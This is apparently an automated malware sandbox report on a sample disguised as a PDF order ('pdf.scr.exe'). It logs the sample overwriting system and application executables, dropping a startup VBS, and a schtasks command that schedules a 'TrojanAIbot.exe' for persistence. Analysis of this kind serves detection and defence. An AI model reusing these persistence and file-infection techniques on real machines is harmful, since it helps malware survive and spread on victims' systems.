Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_00C0CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00C0CBD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.scr

Static PE information: Order SMG 201906 20190816order.pdf.scr.exe

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Users\user\AppData\Roaming\314fa8116a46337b.bin offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Users\user\AppData\Local\Temp\aut129E.tmp offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Users\user\AppData\Local\Temp\aut129E.tmp offset: 753664	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Users\user\AppData\Local\Temp\lecheries offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Users\user\AppData\Local\bothsided\surmit.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\314fa8116a46337b.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
